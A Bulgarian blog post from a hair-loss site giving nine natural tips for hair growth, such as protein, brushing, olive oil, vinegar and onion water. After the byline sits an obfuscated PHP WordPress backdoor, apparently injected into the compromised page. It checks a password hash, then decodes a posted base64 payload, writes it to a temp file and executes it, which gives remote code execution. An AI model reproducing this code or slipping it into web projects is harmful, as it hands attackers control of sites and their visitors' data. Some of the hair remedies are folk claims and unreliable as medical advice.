9 природни метода за растеж на косата | Косопад

9 природни метода за растеж на косата

kosa-5

Трудно е да се постигне дълга, гъста и здрава коса. Необходими са поредица от мерки, така че да постигнете желаните резултати. Ето няколко полезни съвета, които ще ви помогнат:

1 Увеличете консумацията на протеини. Косата е изградена основно от протеини. Увеличете консумацията на това вещества и си взимайте дневната препоръчителна доза. Протеините увеличават производството на червени кръвни телца, които транспортират веществата до космените фоликули. Ето важни източници на протеини: червено месо, риба, пилешко, обезмаслено прясно мляко, ядки, леща, яйца.

2 Решете косата по няколко пъти на ден. Това е един от най- добрите начини за стимулиране кръвообращението в зоната. Изберете четка с меки зъби и си правете масаж два пъти на ден.

3 Избягвайте продуктите със силикон. Известни са с това, че възстановяват косата, но всъщност са доста вредни в дългосрочен план. Запушват космените фоликули, като така пречат на растежа.

4 Не мийте косата си всеки ден. Въпреки че някои хора си мият косите всеки ден, защото са много мазни, това не е препоръчително. Експертите препоръчват да се мие до 2- 3 пъти седмично, за да не обърквате вашето рН.

kosa-miene

5 Подстригвайте връхчетата. Не помага много за растежа на косата, но я прави здрава и силна.

6 Зехтин. Масажът със зехтин подхранва скалпа и го подхранва.

7 Масло от ленено семе. Богато е на мастни киселини, които подобряват сърдечно- съдовото здраве и подхранват в дълбочина.

8 Ябълков оцет. Поддържа скалпа чист и предпазва от пърхот.

9 Вода от лук. Много добре подхранва косата, като я поддържа силна и здрава.Можете да добавите сок от лук към шампоана си. Или да сварите няколко глави лук и после да прецедите течността.

21. декември 2015 19:09:22 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}